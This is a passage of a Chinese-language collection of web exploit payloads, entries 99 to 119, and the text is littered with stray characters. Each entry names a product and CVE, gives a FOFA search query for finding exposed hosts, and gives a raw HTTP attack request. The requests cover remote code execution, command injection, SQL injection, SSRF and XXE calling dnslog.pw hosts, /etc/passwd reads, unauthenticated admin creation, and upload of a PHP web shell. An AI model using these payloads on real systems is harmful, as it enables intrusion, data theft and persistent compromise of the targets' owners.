3 Q. [+ `1 Q% ~# jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 t: j/ E2 W7 Z% Z& c w
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
8 x1 e, [/ u# T* ~* a sX-Requested-With: XMLHttpRequest6 ~5 p/ }8 \' p- e) z
' Y a) r/ x2 A7 J- Sid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B0 u" b) z5 V6 c" F0 o$ B' x
6 B3 c, p* K# `7 z
1 N, R$ X6 Q, z& l2 e
99. Ncast盈可视高清智能录播系统busiFacade RCE
2 Z- D* E& j5 t8 ^! u- k! xCVE-2024-0305
8 {% }9 p: S. T8 V1 A2 j# Z9 YFOFA:app="Ncast-产品" && title=="高清智能录播系统"
% p& \1 O% u/ q* Q: M. `POST /classes/common/busiFacade.php HTTP/1.1' `7 B& t/ [1 f$ _6 e+ |
Host: 192.168.40.130:8080
1 ?& |4 i9 x: C4 C' |! fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0+ e( f/ `5 H p2 `0 Z
Connection: close- C2 z% _; H/ s) M0 z
Content-Length: 154; e- b& Y' g" ]
Accept: */*( N. \3 J) p/ t( I! ^& r
Accept-Encoding: gzip, deflate9 ? F o; O1 I R6 X! B- }$ s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% w9 T+ R# H! s3 [& nContent-Type: application/x-www-form-urlencoded; charset=UTF-8; |( H- W/ q3 H' W) p. g1 |' s$ {
X-Requested-With: XMLHttpRequest
! F0 X4 B" {, q
+ w5 q" u z' ~6 z%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D' S2 x7 X) h+ U( A+ M
/ u; C& t+ O8 h/ G, ]" u1 J2 @4 }+ |2 n h
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
$ T5 \5 S4 D: \7 A& |CVE-2024-0352
$ e9 l" C5 M7 A _8 q0 r5 SFOFA:icon_hash="874152924"+ U6 Q5 K" Y; h# J0 E, }
POST /api/file/formimage HTTP/1.1: Y |- r0 _ i% _& k4 I. U
Host: 192.168.40.130/ g+ h7 T" r. o2 t( s
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.366 K) A# y' L" b2 F# b
Connection: close: q! \0 o; B" J8 p4 {. Q
Content-Length: 201
; _* z( E' l1 K1 d& X5 d/ xContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
& ` G; O( ?# p( t& z& AAccept-Encoding: gzip
& [; P1 L0 X- L l1 L& C* e. b' G# U: B @9 Z9 b
------WebKitFormBoundarygcflwtei
1 O/ {3 g9 m. e4 X: B1 G0 m" E. d) SContent-Disposition: form-data; name="file";filename="IE4MGP.php" ]# M; L, d6 @% I+ V3 ]
Content-Type: application/x-php
) z! U1 d2 n0 ]/ [, L$ B N# A4 m( c; J. [! u" ]8 \9 O; d
2ayyhRXiAsKXL8olvF5s4qqyI2O# h0 @/ A: m4 K% q" t( O6 Q8 T
------WebKitFormBoundarygcflwtei--
6 [1 C" p' @4 ^+ B( m+ h* m4 B6 ]3 s0 [* e, ]
' U6 o9 C5 J2 A101. ivanti policy secure-22.6命令注入! ^& r" W( K" {, o
CVE-2024-21887
+ F1 Y* n' `, L& x+ D' ZFOFA:body="welcome.cgi?p=logo"# X! T+ k& C- H1 [! ]$ B
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
3 b+ @; y) f; C- L# ] C& m* t5 }Host: x.x.x.xx.x.x.x, |& T' b" A3 _7 y% c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# U* @1 m' J& I: B9 a2 {5 Y6 R8 lConnection: close
. }, q- J9 e& {& H, _% q1 MAccept-Encoding: gzip! `5 k: h% e0 N
7 K+ O# Q; `: A0 ?/ Z7 R* L! I2 h7 f
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行* y; s" y" \$ y A: [
CVE-2024-21893
6 b# [. C- O LFOFA:body="welcome.cgi?p=logo"
) f9 K; `1 q7 K3 zPOST /dana-ws/saml20.ws HTTP/1.1; W% J/ M/ d# U: u a/ U6 @* |
Host: x.x.x.x9 N, `. f0 m9 ^! b7 n; K4 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 t0 x. U, f( B: \: l0 ]Connection: close
% W( ^6 S/ J' b1 h/ i# eContent-Length: 7920 m5 A/ M- ?+ X; z8 Z7 M! V# J
Accept-Encoding: gzip
7 r7 w) p Z5 m3 N) N; k% Q1 [" n
; h. }& E- y, `<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
9 L3 T- y( Q2 U0 [3 r9 L5 S9 X/ q4 ]' H
103. Ivanti Pulse Connect Secure VPN XXE
+ }0 W& ?& G' [' E0 L6 c- |/ h" \CVE-2024-22024: |: `3 F3 _) R. B9 T- |' u
FOFA:body="welcome.cgi?p=logo"
" c6 s" w3 F( k% h" I/ }POST /dana-na/auth/saml-sso.cgi HTTP/1.1. O' G e0 }( `% k0 @8 G
Host: 192.168.40.130:111& U! F, F/ s7 X+ |" k
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.367 J' p$ d8 r; M$ U# |( N
Connection: close" N" M! J; B1 {5 [5 S$ q) ~1 t; \
Content-Length: 204
6 P$ b( W9 a3 C1 I6 r+ \& nContent-Type: application/x-www-form-urlencoded* b- _, ~7 [3 l0 ]2 W% L5 B1 Z' p
Accept-Encoding: gzip
' {, F! u u2 @6 J' O2 S$ ]! C$ j' V
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==( n& |1 y6 B: U6 ^* q" ?: P
0 g4 [1 @6 d+ h2 ^2 d& t2 H
- R' Q$ d& ?6 H& g# _ _其中SAMLRequest的值是xml文件内容的base64值,xml文件如下& O; n! c3 A6 |, P0 k
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>: ^% u9 _8 _' I2 j1 L
5 ?9 J+ g; {3 K' s6 n) @8 [
# P: Z& |& }, C' x0 z' [. B8 u1 U! u% W104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
) w! }8 [4 o* H1 UCVE-2024-0569
1 L# H- \7 k% ?: t! I! AFOFA:title="TOTOLINK"1 {( m G0 S6 K# Z9 R' s2 \/ D, R
POST /cgi-bin/cstecgi.cgi HTTP/1.1! }/ S2 X v$ e2 {
Host:192.168.0.16 y& C& d+ N, q$ u
Content-Length:41
M6 J) q4 u. m! h: K) I! vAccept:application/json,text/javascript,*/*;q=0.01
2 h; J- P% L+ u) ^. X7 }& |. ZX-Requested-with: XMLHttpRequest+ J6 L5 ]: I* l4 S3 {
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36/ x$ D+ X$ e: J
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
/ j* b! f- c8 f: B& g; q7 e* j4 UOrigin: http://192.168.0.1
" ], V# X9 y; }- c' z( h* [- d% FReferer: http://192.168.0.1/advance/index.html?time=1671152380564* A3 O% e/ x& `# m. S" g, S0 J
Accept-Encoding:gzip,deflate! E$ r# ]6 \( Y/ d- N* n
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.77 c0 s' o3 L% z' L1 Q2 {
Connection:close+ C$ u/ ], p- h) J
: `. F. Y8 \5 L0 m{+ ~, B, ^6 T1 R" Z! j( z
"topicurl":"getSysStatusCfg",
* M% T) [" U& y"token":"". U/ e7 P" q2 k# R) @: k, |, K
}! ^/ o/ b) L+ y" y1 m7 P
2 w$ c' P4 T# Y" Z105. SpringBlade v3.2.0 export-user SQL 注入8 I; T1 z( m" N5 |0 R
FOFA:body="https://bladex.vip"$ Y/ e) f% L2 T- ?* u; f$ Z
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1# n) [) T8 ^2 R7 E. ^8 A
3 \. f4 p( E$ q6 N3 x) l3 n- |106. SpringBlade dict-biz/list SQL 注入$ Y* t. @4 E; G* a$ E! _
FOFA:body="Saber 将不能正常工作"4 |+ J. }$ {, Y8 s6 \4 P1 T) U( _
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1; z, k' R4 a. w5 }
Host: your-ip3 x4 X: j6 N. ~1 t7 i }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 C1 ^4 K5 { G; D; M, L5 C
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A- J6 X+ c7 s( H/ K+ ]
Accept-Encoding: gzip, deflate
9 d) I; w; o8 v6 `Accept-Language: zh-CN,zh;q=0.9/ @3 s! B, |" ?
Connection: close9 a6 H* v8 o' S( f% k% K
7 o/ \3 X C' { e: L( M# l; z6 [9 ^
107. SpringBlade tenant/list SQL 注入
) f1 N6 [( l: O" \ L+ h9 v3 w0 ^, WFOFA:body="https://bladex.vip": j; w" {' B d$ r) {
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1, v; ^# _4 y5 Z: F4 B' M a+ O
Host: your-ip7 R: z3 S+ y& ?: e, _# q- t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, ~/ f) y0 C1 D; S i. jBlade-Auth:替换为自己的4 A* K; y6 F& e9 U8 g) n6 C1 r! X
Connection: close! Z6 G& J, R) I; g* `+ u1 _1 b
3 h0 y8 X5 c. i. ]7 q/ K- ]6 k0 V4 |
108. D-Tale 3.9.0 SSRF
1 Q# m7 N& ]/ G5 ?$ i" zCVE-2024-216427 a9 C: J6 c3 J2 U& Z& O; c8 |8 ~
FOFA:"dtale/static/images/favicon.png"
% k, u+ M8 Q; q' S ]GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
5 T) h( o4 O/ o6 W; I, R) N* uHost: your-ip
; ^. h* W% |3 Y' i+ V1 `Accept: application/json, text/plain, */*
% O( I3 B$ N4 g* g1 C* Q0 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36! X+ R$ r( Z# N" Q
Accept-Encoding: gzip, deflate! ]7 Q% H9 ?8 E! |! d
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
9 S7 N( R2 J- ^, C( b- FConnection: close" `: P* ]/ ~0 r
, F* z- `* u5 f5 K4 L, [0 R
6 E6 U+ U7 \) W0 o" F4 k109. Jenkins CLI 任意文件读取
+ ~! d" @' S- ^: O2 ?8 X! A9 d$ J; |CVE-2024-23897
5 ^) t* j8 P4 { ~! rFOFA:header="X-Jenkins"( C% ]9 y7 n" B9 f+ |& j' \
POST /cli?remoting=false HTTP/1.1* [# \/ Y4 b5 V6 P' u5 G
Host:
, u2 c. z+ ~* u* o. wContent-type: application/octet-stream
% v/ @& j; F; T2 i; ZSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92% k: [8 }' A8 G# c! ~! S
Side: upload1 S0 W6 X, O" m8 `
Connection: keep-alive
6 D0 `3 V5 N _: ]& bContent-Length: 163
, L0 W# H( x! u. U+ L/ A: y6 W
* o9 ^. o1 m% D& z3 Pb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
: Y& ] m3 B9 u" _
& A9 G+ e$ q9 a8 c
7 `' w. o2 Y& @ N6 s, lPOST /cli?remoting=false HTTP/1.1
6 l; Z) d* p& XHost:
; w- c( J& F. k( m+ sSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92% G2 k% E6 [6 w0 H, r) j, ]* y
download
1 K7 ~* \. `0 D' eContent-Type: application/x-www-form-urlencoded
' q9 i. H& A' u5 U, P2 Z: DContent-Length: 08 Y$ _ C {% F9 }$ v9 ?6 h
7 g! j$ t) Y5 G. j8 q- I6 P$ u& E( F+ S. n/ |# G
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
% ^; X2 z: h$ s; Y: c: Ljava -jar jenkins-cli.jar help
5 a4 m; A) O8 b$ C3 p/ B( L; s+ K[COMMAND]
+ t. Y0 W# Y) R% B2 _9 L, _1 z& PLists all the available commands or a detailed description of single command.* Q; E, a6 Q# O( t' p2 k4 p
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)$ G+ E& K6 S; w+ m, u
6 A" S: E, V2 C Q( J- |# i, S
) V; [/ ~" l! P* S110. Goanywhere MFT 未授权创建管理员
2 q) F8 x+ s$ r9 T; ~5 Q) D6 Q$ q+ gCVE-2024-0204
5 q; `; ?" `8 ^FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932") o4 `# X& B6 q# }: }; S
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1* G/ N+ v1 O O0 l |
Host: 192.168.40.130:8000; q* \" p3 g, f- W; w7 e+ S/ [; z
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
( A3 ^2 I$ o3 [. B( ?Connection: close4 y. {, M- O" D
Accept: */*
3 S3 L! z! w) a0 L: U6 W0 kAccept-Language: en0 i$ ]- u) U; ]# r+ K
Accept-Encoding: gzip; O5 T) ?8 l. m" A+ Q6 N
2 [# k4 N" t+ W6 O% y6 G) \; h
' B/ l! S: _( f% Z) |' D& s* d
111. WordPress Plugin HTML5 Video Player SQL注入. l; {9 x5 ]3 f2 W! q" m
CVE-2024-1061
/ u9 H- T( f" K2 _6 VFOFA:"wordpress" && body="html5-video-player"2 m0 N, d5 u, M/ Y9 F6 k
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
+ R/ d2 p& {& T4 O9 [Host: 192.168.40.130:1121 ^' K! O3 Q; g$ S. E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36) E1 T1 W9 K2 i7 K* A
Connection: close0 c2 V2 c8 `9 Y% A
Accept: */*4 w3 h! x& ~/ D1 ?5 g- F
Accept-Language: en* I# \ ~- H a* k/ p
Accept-Encoding: gzip
2 m3 f1 z) K+ u' q2 L" h' z1 w: z* \
. }' ]" L) v P! [ _! {, n* |112. WordPress Plugin NotificationX SQL 注入4 ~+ M! E: M- x9 K* Q3 `" I$ F
CVE-2024-1698
+ j/ e$ }1 Y" ~FOFA:body="/wp-content/plugins/notificationx"0 ^9 k/ v, S& E# {/ O6 }
POST /wp-json/notificationx/v1/analytics HTTP/1.1
( D8 e0 o8 `5 s+ \. _Host: {{Hostname}}
3 y7 m. a: r& B/ l9 G8 n8 R3 Y; iContent-Type: application/json7 q! ~; p3 g+ ~
+ \) S* N7 f5 x- S
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}+ L7 r' K& d8 U, |( ]. u
1 ?9 V+ u' S& O+ Q% |' V4 d( }- L# h
; B4 k/ G' X/ b& M+ v b3 P113. WordPress Automatic 插件任意文件下载和SSRF
$ F( O: q% B! O2 G) h- RCVE-2024-27954
) p5 @9 k; t2 o. S$ y6 kFOFA:"/wp-content/plugins/wp-automatic"
4 J' s8 N8 U2 @0 q+ d/ jGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.16 E+ w2 c1 T+ _% _- z3 s9 x5 P: ?$ c y
Host: x.x.x.x
2 ]' ?; K) U/ D7 ^6 W$ x7 y- hUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.361 c% ]2 q$ \3 m( j% B5 _
Connection: close
) q( `0 b, N4 S3 _' i C3 e! d' @Accept: */*1 L1 @: N0 L+ J
Accept-Language: en# D5 m+ g8 r+ o7 K8 {* w/ K
Accept-Encoding: gzip
2 ?. P5 ?7 a" C0 G6 k, |9 K9 V4 V) s
7 w# T! v2 e. l114. WordPress MasterStudy LMS插件 SQL注入
# [9 |$ Z8 l$ \. A+ l( H- YFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"! ^- X5 z2 ~% f; y- j
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
$ b8 B8 C- p+ [Host: your-ip" g2 h7 g6 v: z; l+ p( {
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.363 O( c5 K) O1 Q( Z6 c) j% `& t& ~4 K
Accept-Charset: utf-84 M" K8 l. k" p; [
Accept-Encoding: gzip, deflate% n& O3 N! g+ U6 A0 R: |
Connection: close& u7 A. Q2 Y! [. \
8 `1 K6 O- R5 E$ F- R1 ]0 I7 y$ b6 W) I
115. WordPress Bricks Builder <= 1.9.6 RCE
" I% i: E1 A, e' BCVE-2024-25600
' V$ \5 E% I+ w8 V$ v1 w* F! CFOFA: body="/wp-content/themes/bricks/"
, {& D$ e$ d1 L; C* V第一步,获取网站的nonce值
: n) B8 a% S. K; c8 B2 H! [GET / HTTP/1.1
$ q3 Z9 m# r* z6 QHost: x.x.x.x6 c" U( M5 S& ]6 j7 U
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36& z% N6 q* r+ w3 x0 k
Connection: close' h/ \# J# a9 G; H+ ~6 Z
Accept-Encoding: gzip
T g# w! I/ z4 o: ^ U
/ x6 U* z" \, m% e! E( {+ W# x$ C0 g9 d4 ?) \; Y
第二步替换nonce值,执行命令
' ~4 y2 x# Z- z$ U4 a; s4 n. rPOST /wp-json/bricks/v1/render_element HTTP/1.1 q. C2 `" i0 k, x. a; R4 r: E
Host: x.x.x.x- F7 j S# Q: v. J! E) A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36+ V5 V. T& B# h# D
Connection: close
& w1 K- y3 h9 l! k1 o% ?8 y5 I) `9 OContent-Length: 356
0 w& n7 w) z% S; v, D6 MContent-Type: application/json; N% l1 p6 e( w9 F9 W$ a" S
Accept-Encoding: gzip
% V' }1 [- b. h5 M1 r. q- X8 r/ t# d+ ~) `6 g9 e8 d/ v
{2 Y6 Y# c0 h& ?7 ^: C% Z$ j
"postId": "1",0 n; \3 Z: G& U. p
"nonce": "第一步获得的值",; ^6 M2 c3 ^# V: {$ ?
"element": {
. M. `! o6 j% n+ v "name": "container",
1 W P) y4 d9 u "settings": {2 N0 }1 l* x/ x7 E1 }# }
"hasLoop": "true",; F6 G1 ~% c, u9 l0 J
"query": {* }0 H# A, M5 A4 r! `
"useQueryEditor": true,& K- W% ~7 f! J
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",0 Y7 [* m! T9 @, L, F8 E
"objectType": "post"
, r, g' r* n$ _6 m" ` }
, x. y( F# K; V8 t8 R7 t' J, T3 j }
- J7 F" o! G+ u5 I }
$ [3 a* Z8 J0 j% B}% n7 s! f. x) z; H4 \9 ?/ o3 w- \: T
j" L5 R, r7 Y4 O' x3 ~9 `
8 b3 D' o& A8 g0 ]9 o6 v
116. wordpress js-support-ticket文件上传
/ s- Z( ^& i. WFOFA:body="wp-content/plugins/js-support-ticket". _2 w8 o g5 ?/ D( k
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
# V" l7 w [6 [6 p' xHost:
0 ~2 s4 v4 V! ZContent-Type: multipart/form-data; boundary=--------767099171$ }/ u" O; O1 { P' @/ N& l) e
User-Agent: Mozilla/5.01 n! b8 B5 n1 l0 Q
D# Z' y( D( D/ m4 i6 h: F----------767099171
# \3 e; v1 S; c. w3 w1 pContent-Disposition: form-data; name="action"6 H' K; u0 e) J( `0 Q! z
configuration_saveconfiguration
) ~* ]/ e5 S" r. ]3 M. A----------767099171
% S, n% ~' y# z1 k6 gContent-Disposition: form-data; name="form_request"
* q' ~8 y$ ~0 I/ r7 y/ R0 {jssupportticket. B2 I6 W) W% z3 M! x' m
----------7670991714 H! c \( U% I/ r0 g
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
' k, W! E; s. z8 V8 i3 WContent-Type: image/png8 ?; |) T$ F* ^
----------767099171--
( R4 o+ }, O! ^ D$ B3 y: x
6 D! e: R, H1 D( v/ c5 x+ J v; c B7 g' ~1 p
117. WordPress LayerSlider插件SQL注入; a. l, |% I5 K# l
version:7.9.11 – 7.10.0
6 u/ o* D) E* Q! \2 z, e& f" D5 w* eFOFA:body="/wp-content/plugins/LayerSlider/"
" c# e D2 ]! h' @; x3 eGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.18 `+ k: |6 ~" u: w4 l u0 v0 z# e
Host: your-ip
+ c5 Q) H7 k1 k$ H* N7 f# h( VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
- T2 S) w' b1 E5 T) hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) z4 j+ d/ a& }$ e1 `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 A$ w: @/ ^9 `$ g( aAccept-Encoding: gzip, deflate, br
0 n+ @7 G. }/ q9 w; }& KConnection: close
# k1 Z* X. j$ U+ A$ {5 {Upgrade-Insecure-Requests: 1* }- z, l' a: N8 t5 H0 u
& Y; I: @' Z1 F V* U& e+ r& _ T4 n; ~5 ~' `
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
. r+ x0 Z; O9 @- { a% l2 f* [9 k- iCVE-2024-0939
' o0 K" ~3 x: IFOFA:title="Smart管理平台"
/ K; `) w6 Z) J- ]POST /Tool/uploadfile.php? HTTP/1.12 d) y# Q6 P6 w0 {4 b
Host: 192.168.40.130:84435 P7 ~0 m/ x/ R- \
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
; Y9 x8 A/ x. C' I% |; L; LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.00 f1 p* t# d0 C6 C i4 V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 \$ g' {, Q( HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 e) S/ L8 t' e) c) r
Accept-Encoding: gzip, deflate
2 s, s. M3 a g# W6 ~: bContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
5 T/ @5 {7 x+ A7 k1 o& wContent-Length: 405
1 V& L+ B. ^5 MOrigin: https://192.168.40.130:84434 l* f! F6 _, D7 A5 z; s
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
6 M( ~* G) w1 }3 X( OUpgrade-Insecure-Requests: 1
1 T4 V# S; n( s: v- fSec-Fetch-Dest: document; o- S5 ~; H, [) g$ H' x% Z5 |
Sec-Fetch-Mode: navigate Y8 `" F( B; C
Sec-Fetch-Site: same-origin8 j& ]2 D* C _ j' J5 u4 T
Sec-Fetch-User: ?1
, Q0 }4 s; |/ R9 |* z: O. P, WTe: trailers8 I! M; M6 N) s. `4 O: m
Connection: close6 L* w# U: Q7 |8 V' L, h
6 p2 P' m+ k& L! ?1 z# O4 ~-----------------------------13979701222747646634037182887
; y* S& z8 H2 d. P+ z5 A m3 s4 gContent-Disposition: form-data; name="file_upload"; filename="contents.php"
9 R& l6 w' V+ j* P" h# pContent-Type: application/octet-stream
7 Y9 d2 M; v8 H4 ]9 Y; ^( _
: `( W5 I" S% b<?php
8 n- p7 l/ ^1 X. r8 R P$ Csystem($_POST["passwd"]);
, [5 M( u% F1 k+ c0 y5 [?>1 Y: Q% f& d1 M3 `- A4 Z% K
-----------------------------13979701222747646634037182887, a& q4 G6 Y, c2 p& M% ]! N
Content-Disposition: form-data; name="txt_path"* d$ X( p* g0 N# i4 L. y
' Z, p' H. F( i0 k$ ?' M6 d/home/src.php1 i: |/ f9 X1 e& u, Q+ x
-----------------------------13979701222747646634037182887--
; j5 |- p+ R+ B) L+ a" i0 u! g, O& g
3 ?5 i, a" c3 e2 e5 N5 u
' a# @5 H! }0 ~3 L访问/home/src.php# v8 x+ D2 Q. s% l; B/ {
$ [1 b. j8 A/ y3 T# g119. 北京百绰智能S20后台sysmanageajax.php sql注入
( u! \5 o3 v1 x5 y) g+ \ XCVE-2024-12547 `" o0 o: L9 A& D
FOFA:title="Smart管理平台"
1 F" N7 w8 R1 r' V1 K7 m先登录进入系统,默认账号密码为admin/admin* a7 k/ I' ^, C9 l8 h" o' r
POST /sysmanage/sysmanageajax.php HTTP/1.11
( K1 N- A, \& ~Host: x.x.x.x$ Y1 K/ h, u, y0 s
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee3 C4 m: D" R6 y% j+ ^' p& H; Y0 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0; M. Q; L5 G+ T( Y; b
Accept: */*: H. J1 _2 z0 A# d- w# w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 Y; w [: _( H m, N0 b4 VAccept-Encoding: gzip, deflate
5 o! Y9 _( S6 f) E sContent-Type: application/x-www-form-urlencoded;
+ p) |) D5 s5 K' B, o9 mContent-Length: 109& _ ~) d; [: D1 j$ S9 ~$ Q
Origin: https://58.18.133.60:8443
P# B0 s c6 Y4 T4 jReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php# m+ M$ E* s" H7 a X' \& e
Sec-Fetch-Dest: empty j; [( a# Q3 K, W1 K# o" V- @& T
Sec-Fetch-Mode: cors
/ ]2 K& X% y7 O$ q! n+ ]Sec-Fetch-Site: same-origin( p$ v, ?. W5 X. \; W0 [
X-Forwarded-For: 1.1.1.1
